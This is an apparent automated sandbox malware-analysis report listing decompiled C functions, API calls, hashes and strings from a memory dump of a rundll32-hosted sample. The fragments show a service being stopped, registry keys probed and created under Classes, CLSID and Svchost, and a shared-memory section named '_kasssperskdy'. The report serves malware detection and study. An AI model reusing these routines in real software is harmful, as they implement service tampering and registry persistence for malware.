                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEventThread$CompareCurrentErrorExchangeHandleInterlockedLastSwitchclosesocketsendshutdown
                                                            • String ID:
                                                            • API String ID: 4222243704-0
                                                            • Opcode ID: 3c2fd36e4608478b15de0208799ef4aab6c761c5fffa6c6a5f2c062bc79ef59e
                                                            • Instruction ID: 776486bb958fae7bb37aacd8eb5516ea87b186b1da2a74e565ae5e66279b9d35
                                                            • Opcode Fuzzy Hash: 3c2fd36e4608478b15de0208799ef4aab6c761c5fffa6c6a5f2c062bc79ef59e
                                                            • Instruction Fuzzy Hash: C6211074300602EFDB289F25D88CBA9BBA5FF94325F144618E115876D0EB76F8A5CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 94%
                                                            			E04652150(intOrPtr* __ecx, intOrPtr _a4, void* _a8) {
                                                            				intOrPtr* _v8;
                                                            				long _t25;
                                                            				void* _t36;
                                                            				intOrPtr _t39;
                                                            				void* _t45;
                                                            				intOrPtr* _t48;
                                                            				struct _CRITICAL_SECTION* _t51;
                                                            
                                                            				_push(__ecx);
                                                            				_t48 = __ecx;
                                                            				_t36 = 0xff;
                                                            				_t45 = _a8;
                                                            				_v8 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0xc)) != 0) {
                                                            					_t39 = _a4;
                                                            					if(_t39 != 0 &&  *((intOrPtr*)(_t39 + 0x30)) != 0) {
                                                            						_t29 =  ==  ? 0x6c : 0x54;
                                                            						_t51 = ( ==  ? 0x6c : 0x54) + _t39;
                                                            						EnterCriticalSection(_t51);
                                                            						if( *((intOrPtr*)(_a4 + 0x30)) != 0) {
                                                            							SetLastError(0);
                                                            							_t36 =  *((intOrPtr*)( *_v8 + 0xec))(_a4,  *((intOrPtr*)(_t45 + 0x20)),  *((intOrPtr*)(_t45 + 0x1c)));
                                                            						}
                                                            						LeaveCriticalSection(_t51);
                                                            						_t48 = _v8;
                                                            					}
                                                            				} else {
                                                            					SetLastError(0);
                                                            					_t36 =  *((intOrPtr*)( *_t48 + 0xec))(_a4,  *((intOrPtr*)(_t45 + 0x20)),  *((intOrPtr*)(_t45 + 0x1c)));
                                                            				}
                                                            				_t19 = _t45 + 0x28; // 0x28
                                                            				if(InterlockedDecrement(_t19) == 0) {
                                                            					_t25 = E0464C930(_t48 + 0xb0, _t45);
                                                            					if(_t25 == 0) {
                                                            						HeapFree( *( *(_t45 + 0x14)), _t25, _t45);
                                                            					}
                                                            				}
                                                            				return _t36;
                                                            			}


                                                            APIs
                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,046537D4,00000000,?,?,04653568,?,?,?,?,00000000), ref: 0465216D
                                                            • RtlEnterCriticalSection.NTDLL(0000006C), ref: 046521AB
                                                            • SetLastError.KERNEL32(00000000,?,046537D4,00000000,?,?,04653568,?,?,?,?,00000000), ref: 046521BC
                                                            • RtlLeaveCriticalSection.NTDLL(0000006C), ref: 046521D9
                                                            • InterlockedDecrement.KERNEL32(00000028), ref: 046521E6
                                                            • HeapFree.KERNEL32(?,00000000,00000000,00000000,?,046537D4,00000000,?,?,04653568,?,?,?,?,00000000), ref: 04652207
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$DecrementEnterFreeHeapInterlockedLeave
                                                            • String ID:
                                                            • API String ID: 2534375417-0
                                                            • Opcode ID: 62fb9003ab9c2f6b69dd278fd89795915a1b8c534e373a6ed2bb850f5eeefee7
                                                            • Instruction ID: ae08b8fd47780c7780727876fe11ced002160d4839d6d95d7b0fa8eba9310dc7
                                                            • Opcode Fuzzy Hash: 62fb9003ab9c2f6b69dd278fd89795915a1b8c534e373a6ed2bb850f5eeefee7
                                                            • Instruction Fuzzy Hash: 7E218C35200105EFDB149F95D858FAABBA9FF58311F0080AAFE0997620EB31AD11CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E046437E0(void* __ebx, short* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				intOrPtr _v32;
                                                            				struct _SERVICE_STATUS _v36;
                                                            				signed int _t6;
                                                            				void* _t19;
                                                            				short* _t25;
                                                            				void* _t26;
                                                            				signed int _t29;
                                                            
                                                            				_t6 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t6 ^ _t29;
                                                            				_t25 = __ecx;
                                                            				_t19 = OpenSCManagerW(0, 0, 0xf003f);
                                                            				if(_t19 != 0) {
                                                            					_t26 = OpenServiceW(_t19, _t25, 0x24);
                                                            					if(_t26 != 0) {
                                                            						if(QueryServiceStatus(_t26,  &_v36) != 0) {
                                                            							if(_v32 != 1) {
                                                            								ControlService(_t26, 1,  &_v36);
                                                            								_t28 =  !=  ? 1 : 0;
                                                            							}
                                                            						}
                                                            						CloseServiceHandle(_t26);
                                                            					}
                                                            					CloseServiceHandle(_t19);
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t29);
                                                            			}


                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 046437FE
                                                            • OpenServiceW.ADVAPI32(00000000,?,00000024), ref: 0464380E
                                                            • QueryServiceStatus.ADVAPI32(00000000,?,?,00000024), ref: 0464381F
                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,00000024), ref: 0464383D
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000024), ref: 0464384E
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000024), ref: 04643855
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandleOpen$ControlManagerQueryStatus
                                                            • String ID:
                                                            • API String ID: 3062456870-0
                                                            • Opcode ID: 97e82fdc69f6b09383497c62ee61654d8c5d804e5c6f24996753c4db7a98bef5
                                                            • Instruction ID: d9c88d63bb1659623b7c04b54c72b1825e0b44f4f208cd778a368762222640bf
                                                            • Opcode Fuzzy Hash: 97e82fdc69f6b09383497c62ee61654d8c5d804e5c6f24996753c4db7a98bef5
                                                            • Instruction Fuzzy Hash: FC016132701214ABEB145B659C8CEBBBBBCEB89A51B01102DED06D2241FE689C458760
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E04668930(void* __ebx, void* __ecx, void* __edx) {
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr _t2;
                                                            				void* _t3;
                                                            				void* _t4;
                                                            				intOrPtr _t9;
                                                            				void* _t11;
                                                            				void* _t20;
                                                            				void* _t21;
                                                            				void* _t23;
                                                            				void* _t25;
                                                            				void* _t27;
                                                            				void* _t29;
                                                            				void* _t31;
                                                            				void* _t32;
                                                            				long _t36;
                                                            				long _t37;
                                                            				void* _t40;
                                                            
                                                            				_t29 = __edx;
                                                            				_t23 = __ecx;
                                                            				_t20 = __ebx;
                                                            				_t36 = GetLastError();
                                                            				_t2 =  *0x468403c; // 0x8
                                                            				_t42 = _t2 - 0xffffffff;
                                                            				if(_t2 == 0xffffffff) {
                                                            					L2:
                                                            					_t3 = E04668535(_t23, 1, 0x364);
                                                            					_t31 = _t3;
                                                            					_pop(_t25);
                                                            					if(_t31 != 0) {
                                                            						_t4 = E04669171(_t25, _t36, __eflags,  *0x468403c, _t31);
                                                            						__eflags = _t4;
                                                            						if(_t4 != 0) {
                                                            							E04668776(_t25, _t31, 0x468742c);
                                                            							E046684AD(0);
                                                            							_t40 = _t40 + 0xc;
                                                            							__eflags = _t31;
                                                            							if(_t31 == 0) {
                                                            								goto L9;
                                                            							} else {
                                                            								goto L8;
                                                            							}
                                                            						} else {
                                                            							_push(_t31);
                                                            							goto L4;
                                                            						}
                                                            					} else {
                                                            						_push(_t3);
                                                            						L4:
                                                            						E046684AD();
                                                            						_pop(_t25);
                                                            						L9:
                                                            						SetLastError(_t36);
                                                            						E04667199(_t20, _t25, _t29, _t31, _t36);
                                                            						asm("int3");
                                                            						_push(_t20);
                                                            						_push(_t36);
                                                            						_push(_t31);
                                                            						_t37 = GetLastError();
                                                            						_t21 = 0;
                                                            						_t9 =  *0x468403c; // 0x8
                                                            						_t45 = _t9 - 0xffffffff;
                                                            						if(_t9 == 0xffffffff) {
                                                            							L12:
                                                            							_t32 = E04668535(_t25, 1, 0x364);
                                                            							_pop(_t27);
                                                            							if(_t32 != 0) {
                                                            								_t11 = E04669171(_t27, _t37, __eflags,  *0x468403c, _t32);
                                                            								__eflags = _t11;
                                                            								if(_t11 != 0) {
                                                            									E04668776(_t27, _t32, 0x468742c);
                                                            									E046684AD(_t21);
                                                            									__eflags = _t32;
                                                            									if(_t32 != 0) {
                                                            										goto L19;
                                                            									} else {
                                                            										goto L18;
                                                            									}
                                                            								} else {
                                                            									_push(_t32);
                                                            									goto L14;
                                                            								}
                                                            							} else {
                                                            								_push(_t21);
                                                            								L14:
                                                            								E046684AD();
                                                            								L18:
                                                            								SetLastError(_t37);
                                                            							}
                                                            						} else {
                                                            							_t32 = E0466911B(_t25, _t37, _t45, _t9);
                                                            							if(_t32 != 0) {
                                                            								L19:
                                                            								SetLastError(_t37);
                                                            								_t21 = _t32;
                                                            							} else {
                                                            								goto L12;
                                                            							}
                                                            						}
                                                            						return _t21;
                                                            					}
                                                            				} else {
                                                            					_t31 = E0466911B(_t23, _t36, _t42, _t2);
                                                            					if(_t31 != 0) {
                                                            						L8:
                                                            						SetLastError(_t36);
                                                            						return _t31;
                                                            					} else {
                                                            						goto L2;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetLastError.KERNEL32(?,00000000,0465EFC2,00000000,00000002,?,0465FC23,04660991,00000000,?,00000002), ref: 04668934
                                                            • _free.LIBCMT ref: 04668967
                                                            • _free.LIBCMT ref: 0466898F
                                                            • SetLastError.KERNEL32(00000000,00000000,?,00000002,?,?,?,?,?,04660991,00000000,?,0464707A,00000002), ref: 0466899C
                                                            • SetLastError.KERNEL32(00000000,00000000,?,00000002,?,?,?,?,?,04660991,00000000,?,0464707A,00000002), ref: 046689A8
                                                            • _abort.LIBCMT ref: 046689AE
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: 893f654549eb2138487f035143a978ff1169656ba81ea56c24c5b738c624453b
                                                            • Instruction ID: 0efa8b5ee768911b7bffd78f26fd68f21c513e0b4e95b46cbdda49cb9b9a40c1
                                                            • Opcode Fuzzy Hash: 893f654549eb2138487f035143a978ff1169656ba81ea56c24c5b738c624453b
                                                            • Instruction Fuzzy Hash: 27F0D1362066017BE7113B79BC08A2B2629CBC1779F24822CF81BA3284FE34AC024466
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E046362B0(void* __ebx, intOrPtr* __ecx, void* __edi) {
                                                            				void* _v8;
                                                            				void* _v12;
                                                            				void* __esi;
                                                            				void _t16;
                                                            				intOrPtr _t18;
                                                            				void* _t22;
                                                            				long _t27;
                                                            				void* _t34;
                                                            				char _t40;
                                                            				void _t41;
                                                            				intOrPtr* _t46;
                                                            				void* _t56;
                                                            
                                                            				_t44 = __edi;
                                                            				_t36 = __ebx;
                                                            				_t16 =  *0x46865f8; // 0x38f
                                                            				_t46 = __ecx;
                                                            				_t17 =  !=  ? 0x2710 : _t16;
                                                            				 *((intOrPtr*)(__ecx + 0x30)) =  !=  ? 0x2710 : _t16;
                                                            				_t18 = L0464ABF0();
                                                            				 *((intOrPtr*)(_t46 + 0x2c)) = _t18;
                                                            				_t55 = _t18;
                                                            				if(_t18 != 0) {
                                                            					_t41 =  *0x46865f8; // 0x38f
                                                            					E04646C70(__ebx, _t41, __edi, _t46, _t55);
                                                            					_t34 = E04646B70(__ebx, __edi, _t46, _t55);
                                                            					_t56 = _t34;
                                                            					_t35 =  ==  ?  *0x46865f8 : _t34;
                                                            					 *((intOrPtr*)(_t46 + 0x30)) =  ==  ?  *0x46865f8 : _t34;
                                                            				}
                                                            				 *((intOrPtr*)(_t46 + 0x28)) = L04655B14(_t46, _t56, 0x120);
                                                            				E04645A50(_t19, _t44, _t46);
                                                            				_t40 = E04646780(_t19, _t44, _t46);
                                                            				_t5 = _t46 + 4; // 0x4
                                                            				_t22 = _t5;
                                                            				 *_t46 = _t40;
                                                            				if(_t40 != 0) {
                                                            					__eflags =  *_t40 + 0x28;
                                                            					L0463C3E0(_t36, _t40,  *_t40 + 0x28, _t44, _t46, _t22);
                                                            				} else {
                                                            					asm("movaps xmm0, [0x467f960]");
                                                            					asm("movups [eax], xmm0");
                                                            					asm("movups [eax+0x10], xmm0");
                                                            					 *((char*)(_t22 + 0x20)) = 0x30;
                                                            					 *((char*)(_t22 + 0x20)) = _t40;
                                                            				}
                                                            				 *((intOrPtr*)(_t46 + 0x34)) = E04642F10;
                                                            				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Classes\\.codein", 0, 0x20119,  &_v8) != 0) {
                                                            					_t27 = RegOpenKeyExW(0x80000001, L"SOFTWARE\\Classes\\.codein", 0, 0x20119,  &_v12);
                                                            					__eflags = _t27;
                                                            					if(_t27 != 0) {
                                                            						 *(_t46 + 0x38) = 0;
                                                            						return _t46;
                                                            					} else {
                                                            						RegCloseKey(_v12);
                                                            						 *(_t46 + 0x38) = 1;
                                                            						return _t46;
                                                            					}
                                                            				} else {
                                                            					RegCloseKey(_v8);
                                                            					 *(_t46 + 0x38) = 1;
                                                            					return _t46;
                                                            				}
                                                            			}

                                                            APIs
                                                              • Part of subcall function 0464ABF0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0464AC2E
                                                              • Part of subcall function 0464ABF0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0464AC41
                                                              • Part of subcall function 0464ABF0: FreeSid.ADVAPI32(?), ref: 0464AC4A
                                                            • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020119,0464B6FC,?,04686318,?,?,0464B6FC), ref: 04636360
                                                            • RegCloseKey.ADVAPI32(0464B6FC,?,04686318,?,?,0464B6FC), ref: 0463636D
                                                              • Part of subcall function 04646C70: wsprintfW.USER32 ref: 04646CB8
                                                              • Part of subcall function 04646C70: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04646CF5
                                                              • Part of subcall function 04646C70: RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,?,?), ref: 04646D20
                                                              • Part of subcall function 04646C70: RegCloseKey.ADVAPI32(?), ref: 04646D36
                                                              • Part of subcall function 04646B70: wsprintfW.USER32 ref: 04646BB5
                                                              • Part of subcall function 04646B70: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04646BF2
                                                              • Part of subcall function 04646B70: RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,?,?), ref: 04646C1D
                                                              • Part of subcall function 04646B70: RegCloseKey.ADVAPI32(?), ref: 04646C33
                                                            • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00020119,?,?,04686318,?,?,0464B6FC), ref: 04636396
                                                            • RegCloseKey.ADVAPI32(?,?,04686318,?,?,0464B6FC), ref: 046363A3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpen$QueryValuewsprintf$AllocateCheckFreeInitializeMembershipToken
                                                            • String ID: SOFTWARE\Classes\.codein
                                                            • API String ID: 2055797972-3041101089
                                                            • Opcode ID: d0401561727522b634a020f782359e65b1d59bb76286e0924daf4d308c9dec07
                                                            • Instruction ID: 873ab7f46cebf3d3f200fb3a6037ea32fa68334a76268577233c0290ceec52a4
                                                            • Opcode Fuzzy Hash: d0401561727522b634a020f782359e65b1d59bb76286e0924daf4d308c9dec07
                                                            • Instruction Fuzzy Hash: 2631F570600344ABEB209F64DD49B65B7E8FF44309F10226DED46D7251FB75BC508795
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 84%
                                                            			E046378B0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				char _v616;
                                                            				signed int _t15;
                                                            				void* _t45;
                                                            				signed int _t48;
                                                            
                                                            				_t15 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t15 ^ _t48;
                                                            				_t45 = __edx;
                                                            				_push(__edi);
                                                            				E04646050(__ebx, __ecx,  &_v88, __edi, __edx);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_t5 = _t45 + 0x13c; // 0x13c
                                                            				_v616 = _t5;
                                                            				_v612 = 0;
                                                            				if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0) != 0) {
                                                            					L3:
                                                            					return E04655AFE(_v8 ^ _t48);
                                                            				} else {
                                                            					RegSetValueExW(_v612, "1", 0, 4,  &_v616, 4);
                                                            					_t47 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v612);
                                                            					_t54 =  ==  ? 1 : 0;
                                                            					if(( ==  ? 1 : 0) == 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						return E04655AFE(_v8 ^ _t48);
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 046378DF
                                                            • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04637919
                                                            • RegSetValueExW.ADVAPI32(?,0467E09C,00000000,00000004,?,00000004), ref: 0463793A
                                                            • RegCloseKey.ADVAPI32(?), ref: 04637950
                                                            Strings
                                                            • SOFTWARE\Classes\CLSID\%s, xrefs: 046378D9
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseValue$CreateOpenQuerywsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 73588525-1183003970
                                                            • Opcode ID: f5975b5c82b2a21cb0a63c8f095aeb5c3f5ebaf1f2f9308336a9cea966bb0d22
                                                            • Instruction ID: 2987b520876934b0e82582075f564d8d1a0d19bc9ac40e77645a67d6dfe8599f
                                                            • Opcode Fuzzy Hash: f5975b5c82b2a21cb0a63c8f095aeb5c3f5ebaf1f2f9308336a9cea966bb0d22
                                                            • Instruction Fuzzy Hash: 65119371A05228ABDB20DFA5DC48BEFBBBCEF45711F0001A9A90AE6140F6356E04DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 046422B8
                                                            • MonitorFromWindow.USER32(00000000,00000002), ref: 046422C1
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 046422D5
                                                            • EnumDisplaySettingsW.USER32(?), ref: 046422FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MonitorWindow$DesktopDisplayEnumFromInfoSettings
                                                            • String ID: h
                                                            • API String ID: 1862586070-2439710439
                                                            • Opcode ID: 3e4a15ee4af2bfada6c91a635c207ee163b8d16f8813a568f62ac00ff773ba00
                                                            • Instruction ID: 6d89972ac4da7c5fd87c69240ce25d55438a65f7542a7b69ffbf54e0f02637e2
                                                            • Opcode Fuzzy Hash: 3e4a15ee4af2bfada6c91a635c207ee163b8d16f8813a568f62ac00ff773ba00
                                                            • Instruction Fuzzy Hash: 5D21D1316047419FDB24DF74D889A9AF3E8FF88365F00471EE85997241EB30A859CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0464A1E0(char* __ecx, int* __edx) {
                                                            				void* _v8;
                                                            				int _v12;
                                                            				void* __edi;
                                                            				char* _t21;
                                                            				int* _t22;
                                                            
                                                            				_t22 = __edx;
                                                            				_t21 = __ecx;
                                                            				E0465DEA0(__ecx, __ecx, 0,  *((intOrPtr*)(__edx)));
                                                            				E0465DEA0(_t21, _t21, 0,  *_t22);
                                                            				_v8 = 0;
                                                            				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", 0, 0x20019,  &_v8) != 0) {
                                                            					L3:
                                                            					E0465DEA0(_t21, _t21, 0,  *_t22);
                                                            					 *_t22 = 0;
                                                            					return 0;
                                                            				} else {
                                                            					RegQueryValueExW(_v8, L"AppService", 0,  &_v12, _t21, _t22);
                                                            					_t17 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v8);
                                                            					_t28 =  ==  ? 1 : 0;
                                                            					if(( ==  ? 1 : 0) == 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						return 1;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00020019,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0464A21C
                                                            • RegQueryValueExW.ADVAPI32(00000000,AppService,00000000,00000000,?,00000104,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0464A235
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0464A248
                                                            Strings
                                                            • AppService, xrefs: 0464A22D
                                                            • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 0464A212
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: AppService$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
                                                            • API String ID: 3677997916-1367592619
                                                            • Opcode ID: 9877785f57be5e95cab9cd94e1c792d632596a6f7b753a7017824dbdd33b4edc
                                                            • Instruction ID: 26bd7a28a9cbdf30af0e1c3b319606b4d93c9809dbf086456711d27c29fbfb2b
                                                            • Opcode Fuzzy Hash: 9877785f57be5e95cab9cd94e1c792d632596a6f7b753a7017824dbdd33b4edc
                                                            • Instruction Fuzzy Hash: 2D01D672740208BFFB216EE4AC89FBAB7BDEF94615F10007EFD08D1141FA625D5056A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0463B560(void* __eflags) {
                                                            				char _v24;
                                                            				long _v28;
                                                            				char* _v32;
                                                            				char _v36;
                                                            				void* _v40;
                                                            				intOrPtr _v44;
                                                            				void* __ebx;
                                                            				void* _t13;
                                                            				void* _t14;
                                                            				void* _t18;
                                                            				void* _t19;
                                                            				void* _t20;
                                                            				void* _t24;
                                                            				void* _t25;
                                                            
                                                            				_t11 =  &_v24;
                                                            				_v44 = 0x467e898;
                                                            				_v40 = 0;
                                                            				_v36 = 0xc;
                                                            				_v32 =  &_v24;
                                                            				_v28 = 0;
                                                            				_v40 = E0463AE60(_t19, _t24, _t25, _t11);
                                                            				_t22 =  ==  ? 0 :  &_v36;
                                                            				_t13 = CreateFileMappingW(0xffffffff,  ==  ? 0 :  &_v36, 4, 0, 0xd18, L"_kasssperskdy");
                                                            				 *0x4687ad8 = _t13;
                                                            				if(_t13 == 0) {
                                                            					L3:
                                                            					_t20 = 0;
                                                            				} else {
                                                            					_t18 = MapViewOfFile(_t13, 6, 0, 0, 0);
                                                            					 *0x4687adc = _t18;
                                                            					if(_t18 == 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						_t20 = 1;
                                                            					}
                                                            				}
                                                            				_t14 = _v40;
                                                            				_v44 = 0x467e898;
                                                            				if(_t14 != 0) {
                                                            					HeapFree(GetProcessHeap(), 0, _t14);
                                                            				}
                                                            				return _t20;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 0463AE60: InitializeSecurityDescriptor.ADVAPI32(0463B60D,00000001,74D0F560,74CB6490), ref: 0463AE8F
                                                              • Part of subcall function 0463AE60: AllocateAndInitializeSid.ADVAPI32(0463B58F,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0463AEAB
                                                              • Part of subcall function 0463AE60: GetLengthSid.ADVAPI32(00000000,74CB6620), ref: 0463AEB9
                                                              • Part of subcall function 0463AE60: GetProcessHeap.KERNEL32(00000008,00000010), ref: 0463AEC5
                                                              • Part of subcall function 0463AE60: RtlAllocateHeap.NTDLL(00000000), ref: 0463AECC
                                                              • Part of subcall function 0463AE60: InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 0463AEDC
                                                              • Part of subcall function 0463AE60: AddAccessAllowedAce.ADVAPI32(00000000,00000002,10000000,00000000), ref: 0463AEF1
                                                              • Part of subcall function 0463AE60: SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 0463AF02
                                                              • Part of subcall function 0463AE60: FreeSid.ADVAPI32(00000000), ref: 0463AF1B
                                                              • Part of subcall function 0463AE60: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0463AF2B
                                                              • Part of subcall function 0463AE60: HeapFree.KERNEL32(00000000), ref: 0463AF32
                                                            • CreateFileMappingW.KERNEL32(000000FF,0000000C,00000004,00000000,00000D18,_kasssperskdy,0463B60D,74CB6620), ref: 0463B5AC
                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0463B5C4
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0463B5EA
                                                            • HeapFree.KERNEL32(00000000), ref: 0463B5F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$FreeInitializeProcess$AllocateDescriptorFileSecurity$AccessAllowedCreateDaclLengthMappingView
                                                            • String ID: _kasssperskdy
                                                            • API String ID: 1566987605-1033421605
                                                            • Opcode ID: 30afa07b4c04164154c56e4b140461db54ab6b640bfd0d00dc8e23cbda63f4d1
                                                            • Instruction ID: 26d4e80adf076d5bc29753f5425ba0dded7aa6886ed97276a7bcdc384a9938c9
                                                            • Opcode Fuzzy Hash: 30afa07b4c04164154c56e4b140461db54ab6b640bfd0d00dc8e23cbda63f4d1
                                                            • Instruction Fuzzy Hash: E41165B0A40349AEEB10DFA5DC49BBE7BF8EB18711F241119E905B62C0FB75AD048B75
                                                            Uniqueness

